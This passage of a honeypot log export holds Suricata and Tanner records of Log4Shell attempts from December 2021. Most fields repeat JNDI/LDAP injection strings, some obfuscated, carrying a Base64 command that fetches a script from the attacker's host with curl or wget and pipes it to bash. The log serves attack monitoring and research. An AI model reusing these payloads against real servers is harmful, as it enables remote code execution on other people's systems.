""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjEyOC4yMjQuMTUzOjgwKXxiYXNo}"", ""headers"": {""host"": ""172.16.0.42:80"", ""user-agent"": ""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjEyOC4yMjQuMTUzOjgwKXxiYXNo}"", ""referer"": ""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjEyOC4yMjQuMTUzOjgwKXxiYXNo}"", ""accept-encoding"": ""gzip"", ""connection"": ""close""}, ""uuid"": ""ac2f8b51-faff-450d-af71-ad74d24e998e"", ""peer"": {""ip"": ""195.54.160.149"", ""port"": 55576}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""dc7032ca-12c8-4df5-9aee-cf44ae3fbcf5""}}}, ""timestamp"": ""2021-12-14T21:42:39.063067""}",,,,,,GET,,,,,,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjEyOC4yMjQuMTUzOjgwKXxiYXNo}",,,,,,,,,,,index,1,1,"0.6.0","dc7032ca-12c8-4df5-9aee-cf44ae3fbcf5","0.6.0",,,,,,,,,,,,,,,,,,"195.54.160.149",55576,,,,,,,,,200,,,giantmole,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:42:39.063067",,,,,,,,,Tanner,,,"ac2f8b51-faff-450d-af71-ad74d24e998e",
"2021-12-14T21:42:14.889Z",1,AaHlun0BCXMCNTQLc6i7,"logstash-suricata-2021.12.14",,"_doc","41f5ce73-e4e6-402f-bd92-414128b3d431",5a16b4616656,"821eb7a4-bb66-44ba-8f2f-a12f3c9bbe10",5a16b4616656,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2234197153850643,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,5a16b4616656,gzip,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE1OS4yMjMuNS4xMzY6ODApfGJhc2g=}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE1OS4yMjMuNS4xMzY6ODApfGJhc2g=}",16240,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE1OS4yMjMuNS4xMzY6ODApfGJhc2g=}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",49635554,,"{""timestamp"":""2021-12-14T21:42:14.889481+0000"",""flow_id"":2234197153850643,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":36136,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE1OS4yMjMuNS4xMzY6ODApfGJhc2g=}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE1OS4yMjMuNS4xMzY6ODApfGJhc2g=}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE1OS4yMjMuNS4xMzY6ODApfGJhc2g=}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":16240}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",36136,,,,,,,,,,,,doubletomato,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:42:14.889481+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:42:14.889Z",1,AqHlun0BCXMCNTQLc6i7,"logstash-suricata-2021.12.14",,"_doc","41f5ce73-e4e6-402f-bd92-414128b3d431",5a16b4616656,"821eb7a4-bb66-44ba-8f2f-a12f3c9bbe10",5a16b4616656,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"195.54.160.149",36136,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text, with very long lines (747)",f57e5b6f34eeacc1c32cb643fb59a98e,"[]",16240,CLOSED,false,0,,,,,,,2234197153850643,,,,NA,US,US,"United States",,"172.16.0.42","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,5a16b4616656,,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE1OS4yMjMuNS4xMzY6ODApfGJhc2g=}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE1OS4yMjMuNS4xMzY6ODApfGJhc2g=}",16240,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE1OS4yMjMuNS4xMzY6ODApfGJhc2g=}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",49636666,,"{""timestamp"":""2021-12-14T21:42:14.889481+0000"",""flow_id"":2234197153850643,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""195.54.160.149"",""dest_port"":36136,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE1OS4yMjMuNS4xMzY6ODApfGJhc2g=}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE1OS4yMjMuNS4xMzY6ODApfGJhc2g=}"",""http_content_type"":""text/html"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE1OS4yMjMuNS4xMzY6ODApfGJhc2g=}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":16240},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII text, with very long lines (747)"",""gaps"":false,""state"":""CLOSED"",""md5"":""f57e5b6f34eeacc1c32cb643fb59a98e"",""stored"":false,""size"":16240,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,doubletomato,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:42:14.889481+0000",,,,,,,,,Suricata,,,,
"2021-12-14T21:42:14.753Z",1,paHlun0BCXMCNTQLZ6fk,"logstash-tanner-2021.12.14",,"_doc","41f5ce73-e4e6-402f-bd92-414128b3d431",5a16b4616656,"821eb7a4-bb66-44ba-8f2f-a12f3c9bbe10",5a16b4616656,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,gzip,,,close,,,"172.16.0.42:80","${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE1OS4yMjMuNS4xMzY6ODApfGJhc2g=}","${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE1OS4yMjMuNS4xMzY6ODApfGJhc2g=}",,5a16b4616656,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",53472,,"{""method"": ""GET"", ""path"": ""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE1OS4yMjMuNS4xMzY6ODApfGJhc2g=}"", ""headers"": {""host"": ""172.16.0.42:80"", ""user-agent"": ""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE1OS4yMjMuNS4xMzY6ODApfGJhc2g=}"", ""referer"": ""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE1OS4yMjMuNS4xMzY6ODApfGJhc2g=}"", ""accept-encoding"": ""gzip"", ""connection"": ""close""}, ""uuid"": ""ba202866-c91e-40fe-b7da-9dba0bcc580d"", ""peer"": {""ip"": ""195.54.160.149"", ""port"": 36136}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""95390548-c860-4d1b-bdd6-d41485bb2690""}}}, ""timestamp"": ""2021-12-14T21:42:14.753871""}",,,,,,GET,,,,,,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE1OS4yMjMuNS4xMzY6ODApfGJhc2g=}",,,,,,,,,,,index,1,1,"0.6.0","95390548-c860-4d1b-bdd6-d41485bb2690","0.6.0",,,,,,,,,,,,,,,,,,"195.54.160.149",36136,,,,,,,,,200,,,doubletomato,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:42:14.753871",,,,,,,,,Tanner,,,"ba202866-c91e-40fe-b7da-9dba0bcc580d",
"2021-12-14T21:41:18.780Z",1,fXDkun0B6VkG8jKzngMT,"logstash-suricata-2021.12.14",,"_doc","e9a3cad3-1a70-4afb-b260-cc3aee0b11c6",b54b400850b5,"ce6782e1-3f38-44a2-858e-a7d3ea13b253",b54b400850b5,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8080,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,528184600606769,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,b54b400850b5,gzip,,,,"172.16.0.42",,GET,8080,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODA4MCl8YmFzaA==}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODA4MCl8YmFzaA==}",0,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODA4MCl8YmFzaA==}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",49107616,,"{""timestamp"":""2021-12-14T21:41:18.780591+0000"",""flow_id"":528184600606769,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":51600,""dest_ip"":""172.16.0.42"",""dest_port"":8080,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8080,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODA4MCl8YmFzaA==}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODA4MCl8YmFzaA==}"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODA4MCl8YmFzaA==}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",51600,,,,,,,,,,,,busypie,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:41:18.780591+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:38:31.868Z",1,"52_iun0B6VkG8jKzHO-I","logstash-suricata-2021.12.14",,"_doc","e9a3cad3-1a70-4afb-b260-cc3aee0b11c6",b54b400850b5,"ce6782e1-3f38-44a2-858e-a7d3ea13b253",b54b400850b5,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,390024081676209,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,b54b400850b5,gzip,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xOTkuMTg3OjgwKXxiYXNo}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xOTkuMTg3OjgwKXxiYXNo}",1904,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xOTkuMTg3OjgwKXxiYXNo}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",49092631,,"{""timestamp"":""2021-12-14T21:38:31.868114+0000"",""flow_id"":390024081676209,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":38706,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xOTkuMTg3OjgwKXxiYXNo}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xOTkuMTg3OjgwKXxiYXNo}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xOTkuMTg3OjgwKXxiYXNo}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":1904}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",38706,,,,,,,,,,,,busypie,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:38:31.868114+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:38:31.868Z",1,"6G_iun0B6VkG8jKzHO-I","logstash-suricata-2021.12.14",,"_doc","e9a3cad3-1a70-4afb-b260-cc3aee0b11c6",b54b400850b5,"ce6782e1-3f38-44a2-858e-a7d3ea13b253",b54b400850b5,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"195.54.160.149",38706,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text",06f7362b70fa8873a17bc8c48df1056f,"[]",1904,CLOSED,false,0,,,,,,,390024081676209,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"172.16.0.42","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,b54b400850b5,,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xOTkuMTg3OjgwKXxiYXNo}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xOTkuMTg3OjgwKXxiYXNo}",1904,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xOTkuMTg3OjgwKXxiYXNo}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",49093757,,"{""timestamp"":""2021-12-14T21:38:31.868114+0000"",""flow_id"":390024081676209,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""195.54.160.149"",""dest_port"":38706,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xOTkuMTg3OjgwKXxiYXNo}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xOTkuMTg3OjgwKXxiYXNo}"",""http_content_type"":""text/html"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xOTkuMTg3OjgwKXxiYXNo}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":1904},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII text"",""gaps"":false,""state"":""CLOSED"",""md5"":""06f7362b70fa8873a17bc8c48df1056f"",""stored"":false,""size"":1904,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,busypie,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T21:38:31.868114+0000",,,,,,,,,Suricata,,,,
"2021-12-14T21:38:31.678Z",1,9Q3iun0B5e7x5EYnByQm,"logstash-tanner-2021.12.14",,"_doc","e9a3cad3-1a70-4afb-b260-cc3aee0b11c6",b54b400850b5,"ce6782e1-3f38-44a2-858e-a7d3ea13b253",b54b400850b5,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,gzip,,,close,,,"172.16.0.42:80","${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xOTkuMTg3OjgwKXxiYXNo}","${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xOTkuMTg3OjgwKXxiYXNo}",,b54b400850b5,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",204713,,"{""method"": ""GET"", ""path"": ""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xOTkuMTg3OjgwKXxiYXNo}"", ""headers"": {""host"": ""172.16.0.42:80"", ""user-agent"": ""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xOTkuMTg3OjgwKXxiYXNo}"", ""referer"": ""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xOTkuMTg3OjgwKXxiYXNo}"", ""accept-encoding"": ""gzip"", ""connection"": ""close""}, ""uuid"": ""035399ad-996b-49dd-87b2-60898c1c684f"", ""peer"": {""ip"": ""195.54.160.149"", ""port"": 38706}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": 